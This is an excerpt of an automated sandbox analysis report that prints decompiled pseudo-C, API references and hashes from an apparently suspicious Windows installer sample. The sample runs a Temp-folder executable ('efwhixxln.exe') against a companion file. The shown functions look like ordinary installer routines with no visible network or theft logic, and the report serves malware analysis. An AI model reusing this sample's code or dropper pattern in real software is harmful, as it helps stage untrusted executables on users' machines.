                                      • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                      • DeleteObject.GDI32(?), ref: 00401165
                                      • EndPaint.USER32(?,?), ref: 0040116E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                      • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                      • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                      • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 72%
                                      			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                      				struct _ITEMIDLIST* _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				signed int _t44;
                                      				WCHAR* _t45;
                                      				signed char _t47;
                                      				signed int _t48;
                                      				short _t59;
                                      				short _t61;
                                      				short _t63;
                                      				void* _t71;
                                      				signed int _t77;
                                      				signed int _t78;
                                      				short _t81;
                                      				short _t82;
                                      				signed char _t84;
                                      				signed int _t85;
                                      				void* _t98;
                                      				void* _t104;
                                      				intOrPtr* _t105;
                                      				void* _t107;
                                      				WCHAR* _t108;
                                      				void* _t110;
                                      
                                      				_t107 = __esi;
                                      				_t104 = __edi;
                                      				_t71 = __ebx;
                                      				_t44 = _a8;
                                      				if(_t44 < 0) {
                                      					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                      				}
                                      				_push(_t71);
                                      				_push(_t107);
                                      				_push(_t104);
                                      				_t105 =  *0x42a298 + _t44 * 2;
                                      				_t45 = 0x428200;
                                      				_t108 = 0x428200;
                                      				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                      					_t108 = _a4;
                                      					_a4 = _a4 & 0x00000000;
                                      				}
                                      				_t81 =  *_t105;
                                      				_a8 = _t81;
                                      				if(_t81 == 0) {
                                      					L43:
                                      					 *_t108 =  *_t108 & 0x00000000;
                                      					if(_a4 == 0) {
                                      						return _t45;
                                      					}
                                      					return E00406668(_a4, _t45);
                                      				} else {
                                      					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                      						_t98 = 2;
                                      						_t105 = _t105 + _t98;
                                      						if(_t81 >= 4) {
                                      							if(__eflags != 0) {
                                      								 *_t108 = _t81;
                                      								_t108 = _t108 + _t98;
                                      								__eflags = _t108;
                                      							} else {
                                      								 *_t108 =  *_t105;
                                      								_t108 = _t108 + _t98;
                                      								_t105 = _t105 + _t98;
                                      							}
                                      							L42:
                                      							_t82 =  *_t105;
                                      							_a8 = _t82;
                                      							if(_t82 != 0) {
                                      								_t81 = _a8;
                                      								continue;
                                      							}
                                      							goto L43;
                                      						}
                                      						_t84 =  *((intOrPtr*)(_t105 + 1));
                                      						_t47 =  *_t105;
                                      						_t48 = _t47 & 0x000000ff;
                                      						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                      						_t85 = _t84 & 0x000000ff;
                                      						_v28 = _t48 | 0x00008000;
                                      						_t77 = 2;
                                      						_v16 = _t85;
                                      						_t105 = _t105 + _t77;
                                      						_v24 = _t48;
                                      						_v20 = _t85 | 0x00008000;
                                      						if(_a8 != _t77) {
                                      							__eflags = _a8 - 3;
                                      							if(_a8 != 3) {
                                      								__eflags = _a8 - 1;
                                      								if(__eflags == 0) {
                                      									__eflags = (_t48 | 0xffffffff) - _v12;
                                      									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                      								}
                                      								L38:
                                      								_t108 =  &(_t108[lstrlenW(_t108)]);
                                      								_t45 = 0x428200;
                                      								goto L42;
                                      							}
                                      							_t78 = _v12;
                                      							__eflags = _t78 - 0x1d;
                                      							if(_t78 != 0x1d) {
                                      								__eflags = (_t78 << 0xb) + 0x42b000;
                                      								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                      							} else {
                                      								E004065AF(_t108,  *0x42a268);
                                      							}
                                      							__eflags = _t78 + 0xffffffeb - 7;
                                      							if(__eflags < 0) {
                                      								L29:
                                      								E004068EF(_t108);
                                      							}
                                      							goto L38;
                                      						}
                                      						if( *0x42a2e4 != 0) {
                                      							_t77 = 4;
                                      						}
                                      						_t121 = _t48;
                                      						if(_t48 >= 0) {
                                      							__eflags = _t48 - 0x25;
                                      							if(_t48 != 0x25) {
                                      								__eflags = _t48 - 0x24;
                                      								if(_t48 == 0x24) {
                                      									GetWindowsDirectoryW(_t108, 0x400);
                                      									_t77 = 0;
                                      								}
                                      								while(1) {
                                      									__eflags = _t77;
                                      									if(_t77 == 0) {
                                      										goto L26;
                                      									}
                                      									_t59 =  *0x42a264;
                                      									_t77 = _t77 - 1;
                                      									__eflags = _t59;
                                      									if(_t59 == 0) {
                                      										L22:
                                      										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                      										__eflags = _t61;
                                      										if(_t61 != 0) {
                                      											L24:
                                      											 *_t108 =  *_t108 & 0x00000000;
                                      											__eflags =  *_t108;
                                      											continue;
                                      										}
                                      										__imp__SHGetPathFromIDListW(_v8, _t108);
                                      										_a8 = _t61;
                                      										__imp__CoTaskMemFree(_v8);
                                      										__eflags = _a8;
                                      										if(_a8 != 0) {
                                      											goto L26;
                                      										}
                                      										goto L24;
                                      									}
                                      									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                      									__eflags = _t63;
                                      									if(_t63 == 0) {
                                      										goto L26;
                                      									}
                                      									goto L22;
                                      								}
                                      								goto L26;
                                      							}
                                      							GetSystemDirectoryW(_t108, 0x400);
                                      							goto L26;
                                      						} else {
                                      							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                      							if( *_t108 != 0) {
                                      								L27:
                                      								if(_v16 == 0x1a) {
                                      									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                      								}
                                      								goto L29;
                                      							}
                                      							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                      							L26:
                                      							if( *_t108 == 0) {
                                      								goto L29;
                                      							}
                                      							goto L27;
                                      						}
                                      					}
                                      					goto L43;
                                      				}
                                      			}





























                                      0x004066a5
                                      0x004066a5
                                      0x004066a5
                                      0x004066ab
                                      0x004066b0
                                      0x004066c1
                                      0x004066c1
                                      0x004066c9
                                      0x004066ca
                                      0x004066cb
                                      0x004066cc
                                      0x004066cf
                                      0x004066d7
                                      0x004066d9
                                      0x004066ea
                                      0x004066ed
                                      0x004066ed
                                      0x004066f1
                                      0x004066f7
                                      0x004066fa
                                      0x004068d5
                                      0x004068d5
                                      0x004068e0
                                      0x004068ec
                                      0x004068ec
                                      0x00000000
                                      0x00406700
                                      0x00406705
                                      0x0040671a
                                      0x0040671b
                                      0x00406721
                                      0x004068b3
                                      0x004068c1
                                      0x004068c4
                                      0x004068c4
                                      0x004068b5
                                      0x004068b8
                                      0x004068bb
                                      0x004068bd
                                      0x004068bd
                                      0x004068c6
                                      0x004068c6
                                      0x004068cc
                                      0x004068cf
                                      0x00406702
                                      0x00000000
                                      0x00406702
                                      0x00000000
                                      0x004068cf
                                      0x00406727
                                      0x0040672a
                                      0x00406739
                                      0x00406740
                                      0x0040674c
                                      0x0040674f
                                      0x00406752
                                      0x00406753
                                      0x00406758
                                      0x0040675e
                                      0x00406761
                                      0x00406764
                                      0x00406857
                                      0x0040685c
                                      0x0040688f
                                      0x00406894
                                      0x00406899
                                      0x0040689e
                                      0x0040689e
                                      0x004068a3
                                      0x004068a9
                                      0x004068ac
                                      0x00000000
                                      0x004068ac
                                      0x0040685e
                                      0x00406861
                                      0x00406864
                                      0x00406879
                                      0x00406880
                                      0x00406866
                                      0x0040686d
                                      0x0040686d
                                      0x00406888
                                      0x0040688b
                                      0x0040684f
                                      0x00406850
                                      0x00406850
                                      0x00000000
                                      0x0040688b
                                      0x00406771
                                      0x00406775
                                      0x00406775
                                      0x00406776
                                      0x00406778
                                      0x004067b5
                                      0x004067b8
                                      0x004067c8
                                      0x004067cb
                                      0x004067d3
                                      0x004067d9
                                      0x004067d9
                                      0x00406834
                                      0x00406834
                                      0x00406836
                                      0x00000000
                                      0x00000000
                                      0x004067dd
                                      0x004067e2
                                      0x004067e3
                                      0x004067e5
                                      0x004067fc
                                      0x0040680a
                                      0x00406810
                                      0x00406812
                                      0x00406830
                                      0x00406830
                                      0x00406830
                                      0x00000000
                                      0x00406830
                                      0x00406818
                                      0x00406821
                                      0x00406824
                                      0x0040682a
                                      0x0040682e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040682e
                                      0x004067f6
                                      0x004067f8
                                      0x004067fa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004067fa
                                      0x00000000
                                      0x00406834
                                      0x004067c0
                                      0x00000000
                                      0x0040677a
                                      0x00406798
                                      0x004067a1
                                      0x0040683e
                                      0x00406842
                                      0x0040684a
                                      0x0040684a
                                      0x00000000
                                      0x00406842
                                      0x004067ab
                                      0x00406838
                                      0x0040683c
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040683c
                                      0x00406778
                                      0x00000000
                                      0x00406705

                                      APIs
                                      • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00000400), ref: 004067C0
                                      • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                      • lstrcatW.KERNEL32 ref: 0040684A
                                      • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Directory$SystemWindowslstrcatlstrlen
                                      • String ID: "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 4260037668-3855412770
                                      • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                      • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                      • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                      • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004056CA(signed int _a4, WCHAR* _a8) {
                                      				struct HWND__* _v8;
                                      				signed int _v12;
                                      				WCHAR* _v32;
                                      				long _v44;
                                      				int _v48;
                                      				void* _v52;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				WCHAR* _t27;
                                      				signed int _t28;
                                      				long _t29;
                                      				signed int _t37;
                                      				signed int _t38;
                                      
                                      				_t27 =  *0x429244;
                                      				_v8 = _t27;
                                      				if(_t27 != 0) {
                                      					_t37 =  *0x42a314;
                                      					_v12 = _t37;
                                      					_t38 = _t37 & 0x00000001;
                                      					if(_t38 == 0) {
                                      						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                      					}
                                      					_t27 = lstrlenW(0x422728);
                                      					_a4 = _t27;
                                      					if(_a8 == 0) {
                                      						L6:
                                      						if((_v12 & 0x00000004) == 0) {
                                      							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                      						}
                                      						if((_v12 & 0x00000002) == 0) {
                                      							_v32 = 0x422728;
                                      							_v52 = 1;
                                      							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                      							_v44 = 0;
                                      							_v48 = _t29 - _t38;
                                      							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                      							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                      						}
                                      						if(_t38 != 0) {
                                      							_t28 = _a4;
                                      							0x422728[_t28] = 0;
                                      							return _t28;
                                      						}
                                      					} else {
                                      						_t27 = lstrlenW(_a8) + _a4;
                                      						if(_t27 < 0x1000) {
                                      							_t27 = lstrcatW(0x422728, _a8);
                                      							goto L6;
                                      						}
                                      					}
                                      				}
                                      				return _t27;
                                      			}

















                                      0x004056d0
                                      0x004056da
                                      0x004056df
                                      0x004056e5
                                      0x004056f0
                                      0x004056f3
                                      0x004056f6
                                      0x004056fc
                                      0x004056fc
                                      0x00405702
                                      0x0040570a
                                      0x0040570d
                                      0x0040572a
                                      0x0040572e
                                      0x00405737
                                      0x00405737
                                      0x00405741
                                      0x0040574a
                                      0x00405756
                                      0x0040575d
                                      0x00405761
                                      0x00405764
                                      0x00405777
                                      0x00405785
                                      0x00405785
                                      0x00405789
                                      0x0040578b
                                      0x0040578e
                                      0x00000000
                                      0x0040578e
                                      0x0040570f
                                      0x00405717
                                      0x0040571f
                                      0x00405725
                                      0x00000000
                                      0x00405725
                                      0x0040571f
                                      0x0040570d
                                      0x0040579a

                                      APIs
                                      • lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                      • lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                      • lstrcatW.KERNEL32 ref: 00405725
                                      • SetWindowTextW.USER32 ref: 00405737
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                        • Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
                                        • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppData\Local\Temp\ozirvdg.dl,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                      • String ID: ('B
                                      • API String ID: 1495540970-2332581011
                                      • Opcode ID: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                      • Instruction ID: 7f52a71d89202be05388d2ae90ba5930d13dcc1e6093ad3ff4eaa481a322a782
                                      • Opcode Fuzzy Hash: ecaae210665ee7222a04207821391202ddee9f1067a944388ad148c6c7792cdb
                                      • Instruction Fuzzy Hash: C6217A71900518FACB119FA5DD84A8EBFB8EB45360F10857AF904B62A0D67A4A509F68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                      				struct tagLOGBRUSH _v16;
                                      				long _t39;
                                      				long _t41;
                                      				void* _t44;
                                      				signed char _t50;
                                      				long* _t54;
                                      
                                      				if(_a4 + 0xfffffecd > 5) {
                                      					L18:
                                      					return 0;
                                      				}
                                      				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                      				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                      					goto L18;
                                      				} else {
                                      					_t50 = _t54[5];
                                      					if((_t50 & 0xffffffe0) != 0) {
                                      						goto L18;
                                      					}
                                      					_t39 =  *_t54;
                                      					if((_t50 & 0x00000002) != 0) {
                                      						_t39 = GetSysColor(_t39);
                                      					}
                                      					if((_t54[5] & 0x00000001) != 0) {
                                      						SetTextColor(_a8, _t39);
                                      					}
                                      					SetBkMode(_a8, _t54[4]);
                                      					_t41 = _t54[1];
                                      					_v16.lbColor = _t41;
                                      					if((_t54[5] & 0x00000008) != 0) {
                                      						_t41 = GetSysColor(_t41);
                                      						_v16.lbColor = _t41;
                                      					}
                                      					if((_t54[5] & 0x00000004) != 0) {
                                      						SetBkColor(_a8, _t41);
                                      					}
                                      					if((_t54[5] & 0x00000010) != 0) {
                                      						_v16.lbStyle = _t54[2];
                                      						_t44 = _t54[3];
                                      						if(_t44 != 0) {
                                      							DeleteObject(_t44);
                                      						}
                                      						_t54[3] = CreateBrushIndirect( &_v16);
                                      					}
                                      					return _t54[3];
                                      				}
                                      			}









                                      0x0040463d
                                      0x004046f3
                                      0x00000000
                                      0x004046f3
                                      0x0040464e
                                      0x00404652
                                      0x00000000
                                      0x0040466c
                                      0x0040466c
                                      0x00404675
                                      0x00000000
                                      0x00000000
                                      0x00404677
                                      0x00404683
                                      0x00404686
                                      0x00404686
                                      0x0040468c
                                      0x00404692
                                      0x00404692
                                      0x0040469e
                                      0x004046a4
                                      0x004046ab
                                      0x004046ae
                                      0x004046b1
                                      0x004046b3
                                      0x004046b3
                                      0x004046bb
                                      0x004046c1
                                      0x004046c1
                                      0x004046cb
                                      0x004046d0
                                      0x004046d3
                                      0x004046d8
                                      0x004046db
                                      0x004046db
                                      0x004046eb
                                      0x004046eb
                                      0x00000000
                                      0x004046ee

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.928079928.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000005.00000002.927960888.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928099284.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928115050.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.928188834.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                      • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                      • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                      • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                      				intOrPtr _t65;
                                      				intOrPtr _t66;
                                      				intOrPtr _t72;
                                      				void* _t76;
                                      				void* _t79;
                                      
                                      				_t72 = __edx;
                                      				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                      				_t65 = 2;
                                      				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                      				_t66 = E00402D84(_t65);
                                      				_t79 = _t66 - 1;
                                      				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                      				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                      				if(_t79 < 0) {
                                      					L36:
                                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                      				} else {
                                      					__ecx = 0x3ff;
                                      					if(__eax > 0x3ff) {
                                      						 *(__ebp - 0x44) = 0x3ff;
                                      					}
                                      					if( *__edi == __bx) {
                                      						L34:
                                      						__ecx =  *(__ebp - 0xc);
                                      						__eax =  *(__ebp - 8);
                                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                      						if(_t79 == 0) {
                                      							 *(_t76 - 4) = 1;
                                      						}
                                      						goto L36;
                                      					} else {
                                      						 *(__ebp - 0x38) = __ebx;
                                      						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                      						if( *(__ebp - 0x44) > __ebx) {
                                      							do {
                                      								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                      									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                      										__eax = __ebp - 0x50;
                                      										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                      											goto L34;
                                      										} else {
                                      											goto L21;
                                      										}
                                      									} else {
                                      										goto L34;
                                      									}
                                      								} else {
                                      									__eax = __ebp - 0x40;
                                      									_push(__ebx);
                                      									_push(__ebp - 0x40);
                                      									__eax = 2;
                                      									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                      									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                      									if(__eax == 0) {
                                      										goto L34;
                                      									} else {
                                      										__ecx =  *(__ebp - 0x40);
                                      										if(__ecx == __ebx) {
                                      											goto L34;
                                      										} else {
                                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                      											 *(__ebp - 0x4c) = __ecx;
                                      											 *(__ebp - 0x50) = __eax;
                                      											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                      												L28:
                                      												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                      											} else {
                                      												__ebp - 0x50 = __ebp + 0xa;
                                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                      													L21:
                                      													__eax =  *(__ebp - 0x50);
                                      												} else {
                                      													__edi =  *(__ebp - 0x4c);
                                      													__edi =  ~( *(__ebp - 0x4c));
                                      													while(1) {
                                      														_t22 = __ebp - 0x40;
                                      														 *_t22 =  *(__ebp - 0x40) - 1;
                                      														__eax = 0xfffd;
                                      														 *(__ebp - 0x50) = 0xfffd;
                                      														if( *_t22 == 0) {
                                      															goto L22;
                                      														}
                                      														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                      														__edi = __edi + 1;
                                      														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                      														__eax = __ebp + 0xa;
                                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                      															continue;
                                      														} else {
                                      															goto L21;
                                      														}
                                      														goto L22;
                                      													}
                                      												}
                                      												L22:
                                      												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                      													goto L28;
                                      												} else {
                                      													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                      														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                      															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                      															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                      														} else {
                                      															__ecx =  *(__ebp - 0xc);
                                      															__edx =  *(__ebp - 8);
                                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                      														}
                                      														goto L34;
                                      													} else {
                                      														__ecx =  *(__ebp - 0xc);
                                      														__edx =  *(__ebp - 8);
                                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                      														 *(__ebp - 0x38) = __eax;
                                      														if(__ax == __bx) {
                                      															goto L34;
                                      														} else {
                                      															goto L26;
                                      														}
                                      													}
                                      												}
                                      											}
                                      										}
                                      									}
                                      								}
                                      								goto L37;
                                      								L26:
                                      								__eax =  *(__ebp - 8);
                                      							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                      						}
                                      						goto L34;
                                      					}
                                      				}
                                      				L37:
                                      				return 0;
                                      			}








                                      0x004026ec
                                      0x004026ee
                                      0x004026f1
                                      0x004026f3
                                      0x004026f6
                                      0x004026fb
                                      0x004026ff
                                      0x00402702
                                      0x00402705
                                      0x00402c2a
                                      0x00402c2d
                                      0x0040270b
                                      0x0040270b
                                      0x00402712
                                      0x00402714
                                      0x00402714
                                      0x0040271a
                                      0x0040287e
                                      0x0040287e
                                      0x00402881
                                      0x00402886
                                      0x004015b6
                                      0x0040292e
                                      0x0040292e
                                      0x00000000
                                      0x00402720
                                      0x00402721
                                      0x0040272c
                                      0x0040272f
                                      0x0040273b
                                      0x0040273f
                                      0x004027d7
                                      0x004027ef
                                      0x004027ff
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402745
                                      0x00402745
                                      0x00402748
                                      0x00402749
                                      0x0040274c
                                      0x00402751
                                      0x00402758
                                      0x00402760
                                      0x00000000
                                      0x00402766
                                      0x00402766
                                      0x0040276b
                                      0x00000000
                                      0x00402771
                                      0x00402771
                                      0x00402779
                                      0x0040277c
                                      0x0040277f
                                      0x0040283a
                                      0x00402841
                                      0x00402785
                                      0x0040278b
                                      0x00402797
                                      0x00402801
                                      0x00402801
                                      0x00402799
                                      0x00402799
                                      0x0040279c
                                      0x0040279e
                                      0x0040279e
                                      0x0040279e
                                      0x004027a1
                                      0x004027a6
                                      0x004027a9
                                      0x00000000
                                      0x00000000
                                      0x004027ab
                                      0x004027ae
                                      0x004027bc
                                      0x004027c2
